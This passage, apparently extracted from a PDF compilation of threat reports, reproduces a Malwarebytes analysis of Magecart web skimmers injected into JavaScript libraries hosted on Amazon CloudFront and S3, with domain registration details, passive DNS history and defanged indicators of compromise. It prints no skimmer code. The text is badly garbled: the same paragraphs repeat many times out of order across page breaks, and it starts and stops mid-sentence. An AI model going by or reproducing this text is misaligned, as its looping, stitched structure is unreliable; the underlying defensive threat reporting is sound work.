infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 265 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 266 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 267 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 268 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 269 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 270 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 271 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 272 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 273 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 274 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 275 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 276 of 351\n\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 277 of 351\n\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 278 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 279 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 280 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 281 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 282 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 283 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 284 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 285 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 286 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 287 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 288 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 289 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 290 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 291 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 292 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 293 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 294 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 295 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 296 of 351\n\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 297 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have 